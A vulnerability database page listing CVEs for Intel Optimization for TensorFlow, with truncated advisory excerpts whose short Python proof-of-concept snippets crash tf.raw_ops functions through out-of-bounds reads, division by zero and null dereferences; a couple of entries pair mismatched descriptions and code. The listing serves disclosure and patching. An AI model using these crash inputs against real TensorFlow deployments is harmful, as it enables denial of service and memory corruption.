Intel Optimization For Tensorflow vulnerabilities

429 known vulnerabilities affecting intel/optimization_for_tensorflow.

Total CVEs: 429
CISA KEV: 0
Public exploits: 0
Exploited in wild: 0
Severity breakdown: CRITICAL 5, HIGH 121, MEDIUM 200, LOW 103

Vulnerabilities

CVE-2021-29553 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29553 [LOW] CWE-125 Heap OOB in `QuantizeAndDequantizeV3` ### Impact An attacker can read data outside of bounds of heap allocated buffer in `tf.raw_ops.QuantizeAndDequantizeV3`: ```python import tensorflow as tf tf.raw_ops.QuantizeAndDequantizeV3( input=[2.5,2.5], input_min=[0,0], input_max=[1,1], num_bits=[30], signed_input=False, range_given=False, narrow_range=False, axis=3) ``` This is because the [implementation](https://github.com/tensorf
CVE-2021-29538 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29538 [LOW] CWE-369 Division by zero in `Conv2DBackpropFilter` ### Impact An attacker can cause a division by zero to occur in `Conv2DBackpropFilter`: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) filter_sizes = tf.constant([0, 0, 0, 0], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter( input=input_tensor,
CVE-2021-29575 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29575 [LOW] CWE-119 Overflow/denial of service in `tf.raw_ops.ReverseSequence` ### Impact The implementation of `tf.raw_ops.ReverseSequence` allows for stack overflow and/or `CHECK`-fail based denial of service. ```python import tensorflow as tf input = tf.zeros([1, 1, 1], dtype=tf.int32) seq_lengths = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.ReverseSequence( input=input, seq_lengths=seq_lengths, seq_dim=-2, ba
CVE-2021-29516 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29516 [LOW] CWE-476 Null pointer dereference via invalid Ragged Tensors ### Impact Calling `tf.raw_ops.RaggedTensorToVariant` with arguments specifying an invalid ragged tensor results in a null pointer dereference: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) filter_tensor = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) tf.raw_ops.Conv3D(input=input_tensor, fi
CVE-2021-29545 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29545 [LOW] CWE-131 Heap buffer overflow in `SparseTensorToCSRSparseMatrix` ### Impact An attacker can trigger a denial of service via a `CHECK`-fail in converting sparse tensors to CSR Sparse matrices: ```python import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([0.0], dtype=np.float32) dense_shape = [0, 0] s
CVE-2021-29551 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29551 [LOW] CWE-125 OOB read in `MatrixTriangularSolve` ### Impact The implementation of [`MatrixTriangularSolve`](https://github.com/tensorflow/tensorflow/blob/8cae746d8449c7dda5298327353d68613f16e798/tensorflow/core/kernels/linalg/matrix_triangular_solve_op_impl.h#L160-L240) fails to terminate kernel execution if one validation condition fails: ```cc void ValidateInputTensors(OpKernelContext* ctx, const Tensor& in0, const Tensor& in1) override { O
CVE-2021-29584 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29584 [LOW] CWE-190 CHECK-fail due to integer overflow ### Impact An attacker can trigger a denial of service via a `CHECK`-fail caused by an integer overflow in constructing a new tensor shape: ```python import tensorflow as tf input_layer = 2**60-1 sparse_data = tf.raw_ops.SparseSplit( split_dim=1, indices=[(0, 0), (0, 1), (0, 2), (4, 3), (5, 0), (5, 1)], values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], shape=(input_layer, input_layer), num_split=2, name
CVE-2021-29618 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29618 [LOW] CWE-755 Crash in `tf.transpose` with complex inputs ### Impact Passing a complex argument to `tf.transpose` at the same time as passing `conjugate=True` argument results in a crash: ```python import tensorflow as tf tf.transpose(conjugate=True, a=complex(1)) ``` ### Patches We have received a patch for the issue in GitHub commit [1dc6a7ce6e0b3e27a7ae650bfc05b195ca793f88](https://github.com/tensorflow/tensorflow/commit/1dc6a7ce6e
CVE-2021-29527 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29527 [LOW] CWE-369 Division by 0 in `QuantizedConv2D` ### Impact An attacker can trigger a division by 0 in `tf.raw_ops.QuantizedConv2D`: ```python import tensorflow as tf input = tf.zeros([1, 1, 1, 1], dtype=tf.quint8) filter = tf.constant([], shape=[1, 0, 1, 1], dtype=tf.quint8) min_input = tf.constant(0.0) max_input = tf.constant(0.0001) min_filter = tf.constant(0.0) max_filter = tf.constant(0.0001) strides = [1, 1, 1, 1] padding = "SAME" tf.r
CVE-2021-29583 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29583 [LOW] CWE-125 Heap buffer overflow and undefined behavior in `FusedBatchNorm` ### Impact The implementation of `tf.raw_ops.FusedBatchNorm` is vulnerable to a heap buffer overflow: ```python import tensorflow as tf x = tf.zeros([10, 10, 10, 6], dtype=tf.float32) scale = tf.constant([0.0], shape=[1], dtype=tf.float32) offset = tf.constant([0.0], shape=[1], dtype=tf.float32) mean = tf.constant([0.0], shape=[1], dtype=
CVE-2021-29598 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29598 [LOW] CWE-369 Division by zero in TFLite's implementation of `SVDF` ### Impact The implementation of the `SVDF` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/7f283ff806b2031f407db64c4d3edcda8fb9f9f5/tensorflow/lite/kernels/svdf.cc#L99-L102): ```cc const int rank = params->rank; ... TF_LITE_ENSURE_EQ(context, num_filters % rank, 0); ``` An attacker can craft a model
CVE-2021-29570 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29570 [LOW] CWE-125 Heap out of bounds read in `MaxPoolGradWithArgmax` ### Impact The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs: ```python import tensorflow as tf input = tf.constant([10.0, 10.0, 10.0], shape=[1, 1, 3, 1], dtype=tf.float32) grad = tf.constant([10.0, 10.0, 10.0, 10.0], shape=[1, 1, 1, 4], dtype=tf.float32)
CVE-2021-29515 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29515 [LOW] CWE-476 Reference binding to null pointer in `MatrixDiag*` ops ### Impact The implementation of [`MatrixDiag*` operations](https://github.com/tensorflow/tensorflow/blob/4c4f420e68f1cfaf8f4b6e8e3eb857e9e4c3ff33/tensorflow/core/kernels/linalg/matrix_diag_op.cc#L195-L197) does not validate that the tensor arguments are non-empty: ```cc num_rows = context->input(2).flat()(0); num_cols = context->input(3).flat()(0); padding
CVE-2021-29530 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29530 [LOW] CWE-476 Invalid validation in `SparseMatrixSparseCholesky` ### Impact An attacker can trigger a null pointer dereference by providing an invalid `permutation` to `tf.raw_ops.SparseMatrixSparseCholesky`: ```python import tensorflow as tf import numpy as np from tensorflow.python.ops.linalg.sparse import sparse_csr_matrix_ops indices_array = np.array([[0, 0]]) value_array = np.array([-10.0], dtype=np.float32) dense_shape =
CVE-2021-29571 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29571 [LOW] CWE-787 Memory corruption in `DrawBoundingBoxesV2` ### Impact The implementation of `tf.raw_ops.MaxPoolGradWithArgmax` can cause reads outside of bounds of heap allocated data if an attacker supplies specially crafted inputs: ```python import tensorflow as tf images = tf.fill([10, 96, 0, 1], 0.) boxes = tf.fill([10, 53, 0], 0.) colors = tf.fill([0, 1], 0.) tf.raw_ops.DrawBoundingBoxesV2(images=images, boxes=boxes, colors=colors) ``
CVE-2021-29586 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29586 [LOW] CWE-369 Division by zero in optimized pooling implementations in TFLite ### Impact Optimized pooling implementations in TFLite fail to check that the stride arguments are not 0 before calling [`ComputePaddingHeightWidth`](https://github.com/tensorflow/tensorflow/blob/3f24ccd932546416ec906a02ddd183b48a1d2c83/tensorflow/lite/kernels/pooling.cc#L90). Since users can craft special models which will have `params->s
CVE-2021-29563 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29563 [LOW] CWE-617 CHECK-fail in `tf.raw_ops.RFFT` ### Impact An attacker can cause a denial of service by exploiting a `CHECK`-failure coming from the implementation of `tf.raw_ops.RFFT`: ```python import tensorflow as tf inputs = tf.constant([1], shape=[1], dtype=tf.float32) fft_length = tf.constant([0], shape=[1], dtype=tf.int32) tf.raw_ops.RFFT(input=inputs, fft_length=fft_length) ``` The above example causes Eigen code to operate on an empty ma
CVE-2021-29524 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29524 [LOW] CWE-369 Division by 0 in `Conv2DBackpropFilter` ### Impact An attacker can trigger a division by 0 in `tf.raw_ops.Conv2DBackpropFilter`: ```python import tensorflow as tf input_tensor = tf.constant([], shape=[0, 0, 1, 0], dtype=tf.float32) filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) out_backprop = tf.constant([], shape=[0, 0, 1, 1], dtype=tf.float32) tf.raw_ops.Conv2DBackpropFilter(input=input_tensor, filter
CVE-2021-29532 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29532 [LOW] CWE-125 Heap out of bounds read in `RaggedCross` ### Impact An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to `tf.raw_ops.RaggedCross`: ```python import tensorflow as tf ragged_values = [] ragged_row_splits = [] sparse_indices = [] sparse_values = [] sparse_shape = [] dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64) dense_inputs = [dense_inputs_elem]
CVE-2021-29582 | LOW | Affected: ≥ 0, < 2.1.4; ≥ 2.2.0, < 2.2.3; +2 more | 2021-05-21 | Sources: GHSA, OSV
CVE-2021-29582 [LOW] CWE-125 Heap OOB read in `tf.raw_ops.Dequantize` ### Impact Due to lack of validation in `tf.raw_ops.Dequantize`, an attacker can trigger a read from outside of bounds of heap allocated data: ```python import tensorflow as tf input_tensor=tf.constant( [75, 75, 75, 75, -6, -9, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10, -10,\ -10, -10, -10, -10, -10, -10, -